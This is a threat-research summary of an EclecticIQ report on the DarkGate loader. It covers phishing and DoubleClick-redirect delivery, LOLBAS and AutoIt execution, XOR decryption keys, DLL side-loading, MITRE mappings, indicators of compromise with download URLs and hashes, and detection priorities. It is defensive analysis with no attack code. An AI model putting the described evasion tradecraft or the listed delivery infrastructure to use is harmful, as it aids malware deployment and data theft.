Threat Research

DarkGate: Opening Gates for Financially Motivated Threat Actors

Eclecticiq

DarkGate is a modular loader increasingly used by financially motivated actors (e.g., TA577, Ducktail, BianLian, Black Basta) to gain initial access, deploy follow-on tools (info-stealers, Cobalt Strike, ransomware), and exfiltrate data from primarily financial targets in Europe and the USA. The loader abuses phishing, Google DoubleClick open redirects, LOLBAS (curl.exe, cscript.exe, rundll32.exe), AutoIt scripts, DNS TXT and CAB/MSI delivery, and newer DLL side-loading and XOR-based decryption routines to evade detection and persist via Run Keys and a rootkit driver. #DarkGate #IcedID #BianLian #BlackBasta #TA577 #Ducktail #BankDeutschesKraftfahrzeuggewerbe

Keypoints

  • DarkGate distribution relies on phishing emails (PDF lures) that redirect via Google DoubleClick open redirects to attacker-controlled domains hosting ZIP/CAB/MSI payloads.
  • The primary execution chain uses LOLBAS (curl.exe, cscript.exe, rundll32.exe) to download a legitimate AutoIt binary and an encrypted .AU3 AutoIt script that decrypts and launches the DarkGate payload.
  • Version 5 added an internal crypter, polymorphic shellcode, manual process injection, anti-VM checks, and rootkit driver capability; version 6.1.6 introduced DLL side-loading using signed binaries (e.g., VLC, iTunesHelper).
  • Operators use multiple evasion techniques: XOR-based configuration and payload encryption, MZ header stripping, Windows Defender exclusions, Cloudflare abuse and reverse proxies for C2 forwarding.
  • DarkGate is used as an initial access loader by ransomware groups (BianLian, Black Basta) to deploy Cobalt Strike beacons and conduct post-exploitation lateral movement and data theft.
  • EclecticIQ provided detection guidance (SIGMA/KQL rules) targeting renamed AutoIt execution, suspicious use of curl.exe/wscript/cscript from temp folders, and DoubleClick redirections with “&adurl=” parameters.
  • The report includes detailed IOCs (C2 domains, downloader URLs, IPs, and multiple SHA-256 hashes) and a YARA rule to detect final DarkGate payloads.

MITRE Techniques

  • [T1566] Phishing – DarkGate “primarily leverage phishing emails containing links or attachment to distribute the initial infection.” (‘DarkGate campaigns primarily leverage phishing emails containing links or attachment to distribute the initial infection.’)
  • [T1059] Command and Scripting Interpreter – Attackers run AutoIt scripts and VBS to decrypt and execute payloads: “the DarkGate loader runs the malicious .AU3 script, which contains the DarkGate payload.” (‘the DarkGate loader runs the malicious .AU3 script, which contains the DarkGate payload.’)
  • [T1105] Ingress Tool Transfer – Payloads are downloaded via redirected links and ZIP/CAB/MSI files: “redirect victims to the DarkGate downloading page hxxps… and drop the payloads in a ZIP compressed file.” (‘redirect victims to the DarkGate downloading page hxxps[://]myhairven[.]com/hnun/?v=2932774 and drop the payloads in a ZIP compressed file.’)
  • [T1218] Signed Binary Proxy Execution / LOLBAS – The campaign abuses living-off-the-land binaries (curl.exe, cscript.exe, rundll32.exe) to fetch and execute components: “abusing Living Off the Land Binaries (LOLBAS), such as Curl.exe…”. (‘The malware execution method commonly involves abusing Living Off the Land Binaries (LOLBAS), such as Curl.exe, to download the legitimate Autoit binary and the encrypted DarkGate payload…’)
  • [T1574.002] DLL Side-Loading – Version 6.1.6 “started to leverage DLL side loading technique for evasion” by loading malicious DLLs into signed binaries (VLC, iTunesHelper). (‘DarkGate version 6.1.6 started to leverage DLL side loading technique for evasion.’)
  • [T1055] Process Injection – DarkGate performs manual injection to execute in the context of other processes: “Manual process injection”. (‘Manual process injection’)
  • [T1547.001] Registry Run Keys / Autostart Execution – Persistence is established via registry Run Keys and a driver rootkit: “establishes persistence through Windows registry Run Keys… includes a rootkit module, allowing it to operate as a Windows driver.” (‘establishes persistence through Windows registry Run Keys. In its version 5, it includes a rootkit module, allowing it to operate as a Windows driver.’)
  • [T1027] Obfuscated Files or Information – Configuration and payloads use XOR and other obfuscation (polymorphic shellcode, internal crypter): “decrypts itself using the 8-byte XOR key ‘ZLhPAWah’ … decrypted one more time by using one-byte XOR key ‘i’.” (‘decrypts itself using the 8-byte XOR key ‘ZLhPAWah’ … it will be decrypted one more time by using one-byte XOR key “i”’)
  • [T1490/T1005] Data from Local System / Exfiltration – The loader collects system metadata and keylogger data for exfiltration: “DarkGate starts to send encrypted details about the victim computer and starts a keylogging activity.” (‘DarkGate starts to send encrypted details about the victim computer and starts a keylogging activity.’)

Indicators of Compromise

  • [C2 Domains] C2 infrastructure used by DarkGate – newdomainfortesteenestle[.]com, mainsercheronlinehostingbot[.]com
  • [Downloader URLs / Redirects] Redirects and download hosts used in delivery – adclick.g.doubleclick[.]net/pcs/click?…&&adurl=//projetodegente[.]com/, 5[.]181[.]159[.]64/Downloads/trefald.zip (MivoCloud SRL), and 5.252.178[.]193/Downloads/independert.zip/independert.msi
  • [IP Addresses] Hosting/IPs delivering MSI/CAB files – 5.181.159.64, 5.252.178.193 (examples noted for MSI/ZIP hosting)
  • [File Names] Dropped or observed file artifacts – script.au3 (encrypted AutoIt script), independert.msi, trefald.zip
  • [Hashes] SHA-256 samples of Decrypted DarkGate payloads – aee9287f835f93e6093649a826748e9b27f9921df5ce157d6fee982b8775e853, 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d, and 20+ other hashes listed in the report
  • [User-Agent] HTTP client string observed in C2/requests – “Mozilla/4.0 (compatible; Synapse)”

DarkGate delivery chains start with phishing PDF lures that use Google DoubleClick open redirects or direct links to attacker-controlled domains. Victims download ZIP/CAB/MSI payloads that contain a legitimate AutoIt binary and an encrypted AutoIt (.au3) script; the .au3 file decrypts an embedded payload and either launches directly or injects into a running process. Attackers commonly use LOLBAS (curl.exe, cscript.exe, rundll32.exe) to fetch components and run VBS/AutoIt scripts, and have shifted towards CAB/MSI distribution and DNS TXT or Cloudflare-backed reverse proxies to hide download locations.

On execution the loader employs multiple evasion and persistence techniques: an internal crypter and polymorphic shellcode to defeat AV, anti-VM checks and MZ-header stripping, XOR-based multi-stage decryption (e.g., 8-byte key ‘ZLhPAWah’ inside a masqueraded sqlite3.dll, then one-byte XOR ‘i’ in script.au3), Windows registry Run Keys, and an optional rootkit driver for stealth. Version 6.1.6 specifically implements DLL side-loading by wrapping malicious DLLs inside MSI installers and letting signed binaries (VLC, iTunesHelper, etc.) load them, which results in in-memory execution of the final DarkGate payload.

Post-compromise activity includes manual process injection, C2 communications that send system metadata and keylogger logs, and deployment of follow-on tools (info-stealers, Cobalt Strike beacons) by ransomware affiliates to enable lateral movement and data exfiltration. Detection priorities are monitoring for renamed AutoIt executions from temp directories, suspicious curl/wscript/cscript command lines, abnormal DoubleClick &adurl= redirections, and deploying YARA/SIGMA rules and DPI to catch CAB/MSI downloads and the specific XOR/decrypter signatures described in the report.

Read more: https://blog.eclecticiq.com/darkgate-opening-gates-for-financially-motivated-threat-actors